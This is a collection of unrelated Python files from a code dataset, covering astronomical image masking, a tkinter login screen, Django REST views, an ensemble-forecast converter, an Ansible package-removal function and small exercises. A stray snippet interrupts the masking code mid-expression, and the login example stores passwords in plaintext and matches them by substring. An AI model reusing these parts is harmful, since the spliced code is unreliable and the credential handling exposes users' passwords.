np.zeros(set_A.shape[1], dtype = np.float)\n\n\t\tlln = np.array([len(set_A[:,ll][set_A[:,ll] > 0 ]) for ll in range(set_A.shape[1]) ])\n\t\tlr_iso = np.array([np.max(set_A[:,ll]) for ll in range(set_A.shape[1]) ])\n\t\tsr_iso = np.array([np.max(set_B[:,ll]) for ll in range(set_B.shape[1]) ])\n\t\t# bright stars\n\t\tx, y = wcs.all_world2pix(set_ra * U.deg, set_dec * U.deg, 1)\n\t\tia = (x >= 0) & (x <= img.shape[1])\n\t\tib = (y >= 0) & (y <= img.shape[0])\n\t\tie = (set_mag <= 20)\n\t\tiq = lln >= 2\n\t\tig = OBJ == 6\n\t\tic = (ia & ib & ie & ig & iq)\n\t\tsub_x0 = x[ic]\n\t\tsub_y0 = y[ic]\n\t\tsub_A0 = lr_iso[ic]\n\t\tsub_B0 = sr_iso[ic]\n\t\tsub_chi0 = set_chi[ic]\n\n\t\t# saturated source(may not stars)\n\t\txa = ['SATURATED' in qq for qq in xt]\n\t\txv = np.array(xa)\n\t\tidx = xv == True\n\t\tipx = (idx & ia & ib)\n\n\t\tsub_x2 = x[ipx]\n\t\tsub_y2 = y[ipx]\n\t\tsub_A2 = 3 * lr_iso[ipx]\n\t\tsub_B2 = 3 * sr_iso[ipx]\n\t\tsub_chi2 = set_chi[ipx]\n\n\t\tcomx = np.r_[sub_x0[sub_A0 > 0], sub_x2[sub_A2 > 0]]\n\t\tcomy = np.r_[sub_y0[sub_A0 > 0], sub_y2[sub_A2 > 0]]\n\t\tLr = np.r_[sub_A0[sub_A0 > 0], 
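# A numeric check of the extinction correction applied above: multiplying the
# observed flux by 10**(A_lambda / 2.5) undoes A_lambda magnitudes of Galactic
# dimming (the 0.25 mag here is an assumed value).
Al = 0.25
flux_obs = 1.0
print(flux_obs * 10 ** (Al / 2.5))         # ~1.259, the de-reddened flux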
sub_A2[sub_A2 > 0]]\n\t\tSr = np.r_[sub_B0[sub_A0 > 0], sub_B2[sub_A2 > 0]]\n\t\tphi = np.r_[sub_chi0[sub_A0 > 0], sub_chi2[sub_A2 > 0]]\n\n\t\tcx = np.r_[cx, comx]\n\t\tcy = np.r_[cy, comy]\n\t\ta = np.r_[a, Lr]\n\t\tb = np.r_[b, Sr]\n\t\ttheta = np.r_[theta, phi]\n\t\tNumb = Numb + len(comx)\n\n\t\tmask_A = np.ones((img.shape[0], img.shape[1]), dtype = np.float)\n\t\tox = np.linspace(0, img.shape[1] - 1, img.shape[1])\n\t\toy = np.linspace(0, img.shape[0] - 1, img.shape[0])\n\t\tbasic_coord = np.array(np.meshgrid(ox, oy))\n\t\tmajor = a / 2\n\t\tminor = b / 2 # set the star mask based on the major and minor radius\n\t\tsenior = np.sqrt(major**2 - minor**2)\n\n\t\ttdr = np.sqrt((cx - cx_BCG)**2 + (cy - cy_BCG)**2)\n\t\tdr00 = np.where(tdr == np.min(tdr))[0]\n\n\t\tfor k in range(Numb):\n\t\t\txc = cx[k]\n\t\t\tyc = cy[k]\n\n\t\t\tlr = major[k]\n\t\t\tsr = minor[k]\n\t\t\tcr = senior[k]\n\t\t\tchi = theta[k]*np.pi/180\n\n\t\t\tset_r = np.int(np.ceil(1.2 * lr))\n\t\t\tla0 = np.max( [np.int(xc - set_r), 0])\n\t\t\tla1 = np.min( [np.int(xc + set_r +1), img.shape[1] - 1] )\n\t\t\tlb0 = np.max( [np.int(yc - set_r), 0] ) \n\t\t\tlb1 = np.min( [np.int(yc + set_r +1), img.shape[0] - 1] )\n\n\t\t\tif k == dr00[0] :\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\tdf1 = (basic_coord[0,:][lb0: lb1, la0: la1] - xc)* np.cos(chi) + (basic_coord[1,:][lb0: lb1, la0: la1] - yc)* np.sin(chi)\n\t\t\t\tdf2 = (basic_coord[1,:][lb0: lb1, la0: la1] - yc)* np.cos(chi) - (basic_coord[0,:][lb0: lb1, la0: la1] - xc)* np.sin(chi)\n\t\t\t\tfr = df1**2 / lr**2 + df2**2 / sr**2\n\t\t\t\tjx = fr <= 1\n\n\t\t\t\tiu = np.where(jx == True)\n\t\t\t\tiv = np.ones((jx.shape[0], jx.shape[1]), dtype = np.float)\n\t\t\t\tiv[iu] = np.nan\n\t\t\t\tmask_A[lb0: lb1, la0: la1] = mask_A[lb0: lb1, la0: la1] * iv\n\n\t\tmirro_A = mask_A * img\n\n\t\thdu = fits.PrimaryHDU()\n\t\thdu.data = mirro_A\n\t\thdu.header = head_inf\n\t\thdu.writeto(load + 'mask_data/A_plane/1.5sigma/A_mask_data_%s_ra%.3f_dec%.3f_z%.3f.fits'%(band[kk], ra_g, dec_g, z_g),overwrite = True)\n\t\t'''\n\t\tplt.figure()\n\t\tax = plt.imshow(mirro_A, cmap = 'Greys', origin = 'lower', vmin = 1e-3, norm = mpl.colors.LogNorm())\n\t\tplt.colorbar(ax, fraction = 0.035, pad = 0.01, label = '$flux[nmaggy]$')\n\n\t\thsc.circles(cx_BCG, cy_BCG, s = R_p, fc = '', ec = 'b', )\n\t\thsc.circles(cx_BCG, cy_BCG, s = 1.1 * R_p, fc = '', ec = 'b', ls = '--')\n\t\tplt.scatter(cx_BCG, cy_BCG, s = 10, marker = 'X', facecolors = '', edgecolors = 'r', linewidth = 0.5, alpha = 0.5)\n\t\tplt.title('A mask img ra%.3f dec%.3f z%.3f in %s band' % (ra_g, dec_g, z_g, band[kk] ) )\n\t\tplt.xlim(0, mirro_A.shape[1])\n\t\tplt.ylim(0, mirro_A.shape[0])\n\t\tplt.savefig(\n\t\t\t'/mnt/ddnfs/data_users/cxkttwl/ICL/fig_class/A_mask/A_mask_%s_ra%.3f_dec%.3f_z%.3f.png'%(band[kk], ra_g, dec_g, z_g), dpi = 300)\n\t\tplt.close()\n\t\t'''\n\treturn\n\ndef main():\n\tt0 = time.time()\n\tNtot = len(z)\n\tcommd.Barrier()\n\tfor tt in range(len(band)):\n\t\tm, n = divmod(Ntot, cpus)\n\t\tN_sub0, N_sub1 = m * rank, (rank + 1) * m\n\t\tif rank == cpus - 1:\n\t\t\tN_sub1 += n\n\t\tmask_A(tt, z[N_sub0 :N_sub1], ra[N_sub0 :N_sub1], dec[N_sub0 :N_sub1])\n\tcommd.Barrier()\n\tt1 = time.time() - t0\n\tprint('t = ', t1)\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"code_SDSS/ICL_mask_1.5sigma.py","file_name":"ICL_mask_1.5sigma.py","file_ext":"py","file_size_in_byte":8336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532684271","text":"from tkinter import*\nm= 
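# The rotated-ellipse membership test used per source in the masking loop
# above, as a standalone predicate (the function name is invented):
import numpy as np

def in_ellipse(x, y, xc, yc, lr, sr, chi):
    d1 = (x - xc) * np.cos(chi) + (y - yc) * np.sin(chi)   # major-axis offset
    d2 = (y - yc) * np.cos(chi) - (x - xc) * np.sin(chi)   # minor-axis offset
    return d1**2 / lr**2 + d2**2 / sr**2 <= 1

assert in_ellipse(11.0, 10.0, 10.0, 10.0, lr=2.0, sr=1.0, chi=0.0)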
Tk()\nn=Tk()\n\ndef homepg():\n\tl1= Label(m, text=\"WELCOME TO _______ \").grid(row=1, column=1)\n\tb1= Button(m, text=\"Login\", command= login).grid(row=2,column=1)\n\tb2= Button(m, text=\"Signup\", command= signup).grid(row=3,column=1)\n\ndef login():\n    def gsearch(x):\n        # look for the submitted value in the saved credentials file\n        f1 = open(\"file.txt\", \"r\")\n        if x in f1.read():\n            print(\"found\")\n        f1.close()\n    l2= Label(m,text=\"Enter your name: \").grid(row=5, column=1)\n    e1= Entry(m)\n    e1.grid(row=5,column=2) \n    # read the entry when the button is clicked, not when the widget is built\n    b3= Button(m, text=\"Submit\", command=lambda: gsearch(e1.get())).grid(row=5,column=3) \n    l3= Label(m,text=\"Enter your password: \").grid(row=6, column=1)\n    e2= Entry(m,show=\"*\")\n    e2.grid(row=6,column=2)\n    b4= Button(m, text=\"Submit\", command=lambda: gsearch(e2.get())).grid(row=6,column=3)\n    l4= Label(m,text=\"WELCOME BACK\").grid(row=9, column=1)\n    b5= Button(m, text=\"Continue\", command= mainmenu).grid(row=10,column=1) \n\ndef signup():\n    def ginput(x):\n        # append so that saving the password does not overwrite the name\n        f1 = open(\"file.txt\", \"a\") \n        f1.write(x + \"\\n\") \n        f1.close() \n    l2= Label(m,text=\"Enter your name: \").grid(row=5, column=1)\n    e1= Entry(m)\n    e1.grid(row=5,column=2)\n    b3= Button(m, text=\"Submit\", command=lambda: ginput(e1.get())).grid(row=5,column=3) \n    l3= Label(m,text=\"Enter your password: \").grid(row=6, column=1)\n    e2= Entry(m,show=\"*\")\n    e2.grid(row=6,column=2)\n    b4= Button(m, text=\"Submit\", command=lambda: ginput(e2.get())).grid(row=6,column=3) \n    l4= Label(m,text=\"WELCOME\").grid(row=9, column=1)\n    b5= Button(m, text=\"Continue\", command= mainmenu).grid(row=10,column=1)\n    \n# placeholder handlers: the original file does not define these\ndef bmi(): pass\ndef phrate(): pass\ndef exercise(): pass\ndef food(): pass\n\ndef mainmenu():\n    l1= Label(n,text=\"CHOOSE: \").grid(row=1, column=1)\n    b1= Button(n, text=\"BMI\", command= bmi).grid(row=3,column=1)\n    b2= Button(n, text=\"Pulse/ Heart Rate\", command= phrate).grid(row=5,column=1)\n    b3= Button(n, text=\"Calories burnt - Exercise\", command= exercise).grid(row=7,column=1)\n    b4= Button(n, text=\"Calories consumed - Food\", command= food).grid(row=9,column=1)\n    \nhomepg()\n\t\nm.mainloop()\n","sub_path":"GUI.py","file_name":"GUI.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"75820812","text":"# instead of one line like this:\n# a = float(input(\"Enter the height [cm]: \"))\n# there can be two lines like these:\na = input(\"Enter the height [cm]: \")\na = float(a)\n\nb = float(input(\"Enter the width [cm]: \"))\nc = float(input(\"Enter the depth [cm]: \"))\n\nobjetosc = a * b * c\n\nprint(f\"The volume is {objetosc} cm³. Is it more than a litre? {objetosc > 1000}\")\n\nnadmiar = 0\nif objetosc > 1000:\n    print(\"Unfortunately too much\")\n    nadmiar = objetosc - 1000\n    print(\"Too much by\", nadmiar)\n\nprint(\"The excess was\", nadmiar)","sub_path":"basic/ex_08.py","file_name":"ex_08.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"436879333","text":"#Two words are anagrams if you can rearrange the letters from one to spell the other. 
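For example, 'listen' and 'silent' are anagrams. 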
Write a function\n# called is_anagram that takes two strings and returns True if they are anagrams.\ndef is_anagram(str1,str2):\n str1=list(sorted(str1))\n str2=list(sorted(str2))\n if str1==str2:\n return True\n else:\n return False\nstr1=str(input('Enter string1:'))\nstr2=str(input('Enter string2:'))\nprint(is_anagram(str1,str2))","sub_path":"problemset3/proset3_10.py","file_name":"proset3_10.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"166903033","text":"import pandas as pd\nimport numpy as np\n\ndef load(dataName):\n\n\n inputDim = 784\n normalNumber=80\n noise=5\n dataName='datasets/'+dataName\n train_P_df = pd.read_csv(dataName+'/'+'Train_P[%s].csv'%(normalNumber),sep=',')\n train_U_df = pd.read_csv(dataName+'/'+'Train_U[%s]_[%s].csv'%(normalNumber,noise),sep=',')\n \n test_df = pd.read_csv(dataName+'/'+'Test_set[%s].csv'%(normalNumber),sep=',') \n trainU = train_U_df[[ '%s'%(x) for x in range(inputDim)] ].values \n trainP = train_P_df[[ '%s'%(x) for x in range(inputDim)] ].values\n \n testX = test_df[[ '%s'%(x) for x in range(inputDim)] ].values\n testY= test_df['anomaly_label'].values\n\n N_list = train_U_df.loc[train_U_df['anomaly_label']==0].index\n A_list = train_U_df.loc[train_U_df['anomaly_label']==1].index\n \n if dataName =='multimnist':\n normalClass1 = int(normalNumber/10)\n normalClass2 = int(normalNumber%10)\n \n N_list1 = train_U_df.loc[train_U_df['type_label']==normalClass1].index\n N_list2 = train_U_df.loc[train_U_df['type_label']==normalClass2].index\n else: \n N_list1 = N_list\n N_list2 = []\n\n return trainP,trainU,N_list,N_list1,N_list2,A_list,testX,testY\n","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"603907886","text":"# -*- coding: utf-8 -*-\n\nfrom django.http import Http404\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import fields, serializers\nfrom django.http import HttpResponse, JsonResponse\nfrom django.db import connection\nfrom rest_framework.decorators import api_view\nimport datetime\nfrom ...util.date_util import formataData\n\nfrom ..models import v_setor, v_pessoa, v_centro_custo, v_item, v_cmcfuncionarios\n\n\nclass SetorSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_setor\n fields = ('set_id', 'set_nome', 'set_sigla', 'set_id_superior', 'set_ativo', 'set_tipo')\n\n\nclass PessoaSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_pessoa\n fields = ('pes_matricula', 'pes_nome', 'set_id')\n\n\nclass CentroCustoSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_centro_custo\n fields = ('centrocusto', 'local', 'descricao', 'ativoinativoai', 'codigoresponsavel')\n\n\nclass ItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_item\n fields = (\n 'item', 'unidade', 'classificacao', 'desc_classificacao', 'desc_item', 'estocavel', 'ativoinativoai', 'valor',\n 'ativo_classificacao', 'itememanalisesn')\n\n\nclass FuncionarioSerializer(serializers.ModelSerializer):\n class Meta:\n model = v_cmcfuncionarios\n fields = ('matricula', 'pessoa', 'pes_nome', 'funcao', 'set_id', 'ind_estagiario', 'cpf')\n\n\n@api_view(['GET'])\ndef setores(request):\n setores = v_setor.objects.filter(set_ativo=True).order_by('set_nome')\n serializer = 
SetorSerializer(setores, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef pessoas_setor(request, set_id):\n    pessoas = v_pessoa.objects.filter(set_id=set_id)\n    serializer = PessoaSerializer(pessoas, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef pessoa(request, pes_matricula):\n    pessoa = v_pessoa.objects.get(pes_matricula=pes_matricula)\n    serializer = PessoaSerializer(pessoa)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef pessoas(request):\n    pessoas = v_pessoa.objects.all()\n    serializer = PessoaSerializer(pessoas, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef setor(request, pes_matricula):\n    try:\n        pessoa = v_pessoa.objects.get(pes_matricula=pes_matricula)\n        setor = v_setor.objects.get(set_id=pessoa.set_id)\n        serializer = SetorSerializer(setor, many=False)\n        return Response(serializer.data)\n    except (v_pessoa.DoesNotExist, v_setor.DoesNotExist):\n        # catch the model exceptions; the local variables are unbound when get() raises\n        raise Http404\n\n\n@api_view(['GET'])\ndef centros_custo(request):\n    centros_custo = v_centro_custo.objects.filter(ativoinativoai='A').order_by('descricao')\n    serializer = CentroCustoSerializer(centros_custo, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef centro_custo(request, centro_custo):\n    try:\n        centro_custo = v_centro_custo.objects.get(centrocusto=centro_custo)\n        serializer = CentroCustoSerializer(centro_custo, many=False)\n        return Response(serializer.data)\n    except v_centro_custo.DoesNotExist:\n        raise Http404\n\n\n@api_view(['GET'])\ndef itens(request):\n    itens = v_item.objects.filter(ativoinativoai='A').order_by('desc_item')\n    serializer = ItemSerializer(itens, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef item(request, item_id):\n    try:\n        item = v_item.objects.get(item=item_id)\n        serializer = ItemSerializer(item, many=False)\n        return Response(serializer.data)\n    except v_item.DoesNotExist:\n        raise Http404\n\n\n@api_view(['GET'])\ndef setor_setor(request, set_id):\n    try:\n        setor = v_setor.objects.get(set_id=set_id)\n        serializer = SetorSerializer(setor, many=False)\n        return Response(serializer.data)\n    except v_setor.DoesNotExist:\n        raise Http404\n\n\n@api_view(['GET'])\ndef funcionarios(request):\n    funcionarios = v_cmcfuncionarios.objects.all().order_by('pes_nome')\n    serializer = FuncionarioSerializer(funcionarios, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef funcionarios_setor(request, set_id):\n    funcionarios = v_cmcfuncionarios.objects.filter(set_id=set_id).order_by('pes_nome')\n    serializer = FuncionarioSerializer(funcionarios, many=True)\n    return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef funcionario(request, pessoa):\n    try:\n        func = v_cmcfuncionarios.objects.get(pessoa=pessoa)\n        serializer = FuncionarioSerializer(func, many=False)\n        return Response(serializer.data)\n    except v_cmcfuncionarios.DoesNotExist:\n        raise Http404\n\n\n@api_view(['GET'])\ndef funcionario_matricula(request, matricula):\n    try:\n        funcionario = v_cmcfuncionarios.objects.get(matricula=matricula)\n        serializer = FuncionarioSerializer(funcionario, many=False)\n        return Response(serializer.data)\n    except v_cmcfuncionarios.DoesNotExist:\n        raise Http404\n\n\ndef recursive_setores_subordinados(array, set_id, full):\n    setores = v_setor.objects.filter(set_ativo=True).filter(set_id_superior=set_id)\n    if setores:\n        for setor in setores:\n            setor_json = {}\n            setor_json['set_id'] = setor.set_id\n            setor_json['set_nome'] = setor.set_nome\n            setor_json['set_sigla'] = setor.set_sigla\n            setor_json['set_id_superior'] = setor.set_id_superior\n            setor_json['set_ativo'] = setor.set_ativo\n            setor_json['set_tipo'] = setor.set_tipo\n            array.append(setor_json)\n            if full == '1':\n                recursive_setores_subordinados(array, setor.set_id, full)\n\n\n
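# setores_subordinados returns the active sub-sectors of set_id as plain JSON;\n# when full == '1' the helper above recurses through every descendant level.\n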
@api_view(['GET'])\ndef setores_subordinados(request, set_id, full):\n    array_setores = []\n\n    recursive_setores_subordinados(array_setores, set_id, full)\n\n    return JsonResponse(array_setores, safe=False)\n\n\n@api_view(['GET'])\ndef funcionarios_setor_func(request, set_id):\n    func_json = []\n\n    c = connection.cursor()\n    c.callproc(\"fn_remoto_funcionarios\", [set_id, ])\n    funcionarios = c.fetchall()\n    c.close() \n    for f in funcionarios:\n        e_json = {}\n        e_json['pessoa'] = f[0]\n        e_json['matricula'] = f[1]\n        e_json['pes_nome'] = f[2]\n        e_json['funcao'] = f[3]\n        e_json['set_id'] = f[4]\n        e_json['ind_estagiario'] = f[5]\n        func_json.append(e_json)\n    return JsonResponse(func_json, safe=False)","sub_path":"mscmcldap/api/views/elotech.py","file_name":"elotech.py","file_ext":"py","file_size_in_byte":6552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"527034563","text":"# ListNode is assumed to come from the LeetCode scaffold (fields: val, next).\ndef reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:\n    def reverse_linked_list(head: ListNode):\n        # (a linked list can also be reversed recursively)\n        pre = None\n        cur = head\n        while cur:\n            next = cur.next\n            cur.next = pre\n            pre = cur\n            cur = next\n\n    # because the head node may change, a dummy head node avoids complicated case analysis\n    dummy_node = ListNode(-1,head)\n    pre = dummy_node\n    # step 1: walk left - 1 steps from the dummy node to the node just before position left\n    # (a for loop is recommended here, the intent is clearer)\n    for _ in range(left - 1):\n        pre = pre.next\n\n    # step 2: walk right - left + 1 more steps from pre to reach the right node\n    right_node = pre\n    for _ in range(right - left + 1):\n        right_node = right_node.next\n    \n    # step 3: cut out the sublist\n    left_node = pre.next\n    curr = right_node.next\n    # note: sever the links\n    pre.next = None\n    right_node.next = None\n\n    # step 4: reverse the sub-interval of the list, as in problem 206\n    reverse_linked_list(left_node)\n    # step 5: splice it back into the original list\n    pre.next = right_node\n    left_node.next = curr\n    return dummy_node.next","sub_path":"0092 Reverse Linked List II.py","file_name":"0092 Reverse Linked List II.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"505609405","text":"import sys\nimport argparse\nimport numpy as np\nimport verif.input\nimport verif.util\nimport netCDF4\nimport copy\nimport astropy.convolution\nimport scipy\nimport scipy.signal\nimport scipy.interpolate\n\n\ndef convolve(array, window, ignore_missing):\n    \"\"\" Convolves the Verif array across the leadtime dimension \"\"\"\n    assert(len(array.shape) == 3)\n    c = np.ones([1, window, 1])\n    if ignore_missing:\n        # Does this work?\n        array[np.isnan(array)] = 0\n    new_array = np.nan*np.zeros(array.shape)\n    new_array[:, (window-1):, :] = scipy.signal.convolve(array, c, \"valid\")\n    return new_array\n\n\ndef main():\n    parser = argparse.ArgumentParser(prog=\"ens2prob\", description=\"Converts ensemble information to probabilistic information\")\n    parser.add_argument('ifile', help=\"Verif text or NetCDF file (input)\")\n    parser.add_argument('ofile', help=\"Verif NetCDF file (output)\")\n    parser.add_argument('-r', type=verif.util.parse_numbers, default=[], help=\"Which thresholds to compute CDF values for?\", dest=\"thresholds\")\n    parser.add_argument('-q', type=verif.util.parse_numbers, default=[], help=\"Which quantiles to compute values for?\", dest=\"quantiles\")\n\n    if len(sys.argv) == 1:\n        parser.print_help()\n        sys.exit(0)\n\n    args = parser.parse_args()\n\n    ifile = 
verif.input.get_input(args.ifile)\n locations = ifile.locations\n locationids = [loc.id for loc in locations]\n leadtimes = ifile.leadtimes\n times = ifile.times\n lats = [loc.lat for loc in locations]\n lons = [loc.lon for loc in locations]\n elevs = [loc.elev for loc in locations]\n\n fcst = copy.deepcopy(ifile.fcst)\n obs = copy.deepcopy(ifile.obs)\n ens = copy.deepcopy(ifile.ensemble)\n if len(args.thresholds) > 0:\n cdf = np.zeros([fcst.shape[0], fcst.shape[1], fcst.shape[2], len(args.thresholds)])\n if len(args.quantiles) > 0:\n x = np.zeros([fcst.shape[0], fcst.shape[1], fcst.shape[2], len(args.quantiles)])\n\n for i, threshold in enumerate(args.thresholds):\n cdf[:, :, :, i] = np.nanmean(ens < threshold, axis=3)\n\n M = ens.shape[3]\n \"\"\"\n To compute inverse CDFs, assign quantiles to each ensemble member. There are several approaches:\n - Set the lowest member to and the highest to 1\n - Set the lowest to 1 / (M+1) and the highest to M / (M+1)\n In either case, if a value is outside the ensemble range, set the value to the CDF assigned to\n the nearest member.\n \"\"\"\n lower_cdf = 0 # 1.0 / (M + 1)\n upper_cdf = 1 # float(M) / (M + 1)\n for i, quantile in enumerate(args.quantiles):\n f = scipy.interpolate.interp1d(np.linspace(lower_cdf, upper_cdf, M), ens, bounds_error=False, fill_value=[lower_cdf, upper_cdf], axis=3)\n x[:, :, :, i] = f(quantile)\n\n file = netCDF4.Dataset(args.ofile, 'w', format=\"NETCDF4\")\n file.createDimension(\"leadtime\", len(ifile.leadtimes))\n file.createDimension(\"time\", None)\n file.createDimension(\"location\", len(ifile.locations))\n if len(args.thresholds) > 0:\n file.createDimension(\"threshold\", len(args.thresholds))\n if len(args.quantiles) > 0:\n file.createDimension(\"quantile\", len(args.quantiles))\n vTime=file.createVariable(\"time\", \"i4\", (\"time\",))\n vOffset=file.createVariable(\"leadtime\", \"f4\", (\"leadtime\",))\n vLocation=file.createVariable(\"location\", \"f8\", (\"location\",))\n vLat=file.createVariable(\"lat\", \"f4\", (\"location\",))\n vLon=file.createVariable(\"lon\", \"f4\", (\"location\",))\n vElev=file.createVariable(\"altitude\", \"f4\", (\"location\",))\n vFcst=file.createVariable(\"fcst\", \"f4\", (\"time\", \"leadtime\", \"location\"))\n vObs=file.createVariable(\"obs\", \"f4\", (\"time\", \"leadtime\", \"location\"))\n if len(args.thresholds) > 0:\n vCdf=file.createVariable(\"cdf\", \"f4\", (\"time\", \"leadtime\", \"location\", \"threshold\"))\n vThreshold=file.createVariable(\"threshold\", \"f4\", (\"threshold\"))\n if len(args.quantiles) > 0:\n vX=file.createVariable(\"x\", \"f4\", (\"time\", \"leadtime\", \"location\", \"quantile\"))\n vQuantile=file.createVariable(\"quantile\", \"f4\", (\"quantile\"))\n file.Variable = ifile.variable.name\n file.units = unit = ifile.variable.units.replace(\"$\", \"\")\n file.Convensions = \"verif_1.0.0\"\n\n vObs[:] = obs\n vFcst[:] = fcst\n vTime[:] = times\n vOffset[:] = leadtimes\n vLocation[:] = locationids\n vLat[:] = lats\n vLon[:] = lons\n vElev[:] = elevs\n if len(args.thresholds) > 0:\n vThreshold[:] = args.thresholds\n vCdf[:] = cdf\n if len(args.quantiles) > 0:\n vQuantile[:] = args.quantiles\n vX[:] = x\n\n file.close()\n\nif __name__ == '__main__':\n main()\n","sub_path":"scripts/ens2prob.py","file_name":"ens2prob.py","file_ext":"py","file_size_in_byte":4457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496949976","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as 
plt\n\ndfErr =pd.read_csv(\"err_infiniteBeam.csv\", index_col='case')\ndfCase =pd.read_csv(\"../../caseDefinition.csv\", index_col='case')\n\nx = dfCase[\"mu_t\"].unique()\ny = dfCase[\"albedo\"].unique()\n\nX,Y = np.meshgrid(x,y)\nprint(X)\nprint(Y)\n\nma = dfErr[\"absMa1Normalized\"].values.reshape(x.size, y.size)\nme = dfErr[\"absMe1Normalized\"].values.reshape(x.size, y.size)\nprint(ma)\n\n\nfig, ax = plt.subplots()\nCS = ax.contour(X, Y, np.transpose(ma))\nax.clabel(CS, inline=1, fontsize=10)\n#plt.show()\nplt.xlabel(\"Optical depth\")\nplt.ylabel(\"Scattering albedo\")\nplt.savefig(\"ma1normalized.png\")\nplt.close()\n\nfig, ax = plt.subplots()\nCS = ax.contour(X, Y, np.transpose(me))\nax.clabel(CS, inline=1, fontsize=10)\n#plt.show()\nplt.xlabel(\"Optical depth\")\nplt.ylabel(\"Scattering albedo\")\nplt.savefig(\"me1normalized.png\")\nplt.close()\n","sub_path":"infiniteBeam/postprocessing/contour.py","file_name":"contour.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"194972151","text":"def remove(m, pkgspec, cache, purge=False, force=False, dpkg_options=expand_dpkg_options(DPKG_OPTIONS), autoremove=False):\n pkg_list = []\n pkgspec = expand_pkgspec_from_fnmatches(m, pkgspec, cache)\n for package in pkgspec:\n (name, version) = package_split(package)\n (installed, installed_version, upgradable, has_files) = package_status(m, name, version, cache, state='remove')\n if (installed_version or (has_files and purge)):\n pkg_list.append((\"'%s'\" % package))\n packages = ' '.join(pkg_list)\n if (not packages):\n m.exit_json(changed=False)\n else:\n if force:\n force_yes = '--force-yes'\n else:\n force_yes = ''\n if purge:\n purge = '--purge'\n else:\n purge = ''\n if autoremove:\n autoremove = '--auto-remove'\n else:\n autoremove = ''\n if m.check_mode:\n check_arg = '--simulate'\n else:\n check_arg = ''\n cmd = ('%s -q -y %s %s %s %s %s remove %s' % (APT_GET_CMD, dpkg_options, purge, force_yes, autoremove, check_arg, packages))\n (rc, out, err) = m.run_command(cmd)\n if m._diff:\n diff = parse_diff(out)\n else:\n diff = {\n \n }\n if rc:\n m.fail_json(msg=(\"'apt-get remove %s' failed: %s\" % (packages, err)), stdout=out, stderr=err, rc=rc)\n m.exit_json(changed=True, stdout=out, stderr=err, diff=diff)","sub_path":"Data Set/bug-fixing-5/7850dfa9d932a24a3a095234910c233344b1cda1--fix.py","file_name":"7850dfa9d932a24a3a095234910c233344b1cda1--fix.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"461318345","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom util import normalize_str\nimport json\nimport uuid\nfrom os import path, makedirs\nimport hashlib\n\nclass Member:\n \"\"\"\n Class representing a single member of the parliament\n \"\"\"\n def __init__(self, first_name, last_name, party, province, language, url=None):\n \"\"\"Class representing a single member of the parliament\n\n Args:\n first_name (str): First name of the member\n last_name (str): Last name of the member\n party (str): Party affiliation of the member\n province (str): Province the member ran in\n language (str): Language of the member\n url (str, optional): URL to the wikipedia page of the member. 
Defaults to None.\n \"\"\"\n self.first_name = first_name\n self.last_name = last_name\n self.party = party\n self.province = province\n self.language = language\n self.alternative_names = []\n self.url = url\n sha_1 = hashlib.sha1()\n sha_1.update(self.first_name.encode('utf-8') + self.last_name.encode('utf-8') + self.party.encode('utf-8') + self.province.encode('utf-8'))\n self.uuid = sha_1.hexdigest()[:10]# Should be sufficiently random\n\n def dump_json(self, base_path, base_URI=\"/\"):\n base_path = path.join(base_path, \"members\")\n base_URI = f'{base_URI}members/'\n resource_name = f'{self.uuid}.json'\n\n makedirs(base_path, exist_ok=True)\n \n with open(path.join(base_path, resource_name), 'w+') as fp:\n json.dump({'id': str(self.uuid), 'first_name': self.first_name, 'last_name': self.last_name, 'language': self.language, 'province': self.province, 'part': self.party, 'wiki': self.url}, fp, ensure_ascii=False)\n\n return f'{base_URI}{resource_name}'\n def __repr__(self):\n return \"Member(\\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\", \\\"%s\\\")\" % (self.first_name, self.last_name, self.party, self.province, self.language, self.url)\n def __str__(self):\n return \"%s, %s\" % (self.first_name, self.last_name)\n def hasName(self, query):\n \"\"\"Compare the query string with the \"{last_name} {first_name}\" combination of\n this member, ignoring any diactritical characters. Alternative names are also possible for\n the member, this is sometimes necessary.\n\n Args:\n query (str): Name as seen in the meeting notes of the parliament.\n\n Returns:\n bool: Is this the name of this member\n \"\"\"\n name = \"%s %s\" % (self.last_name, 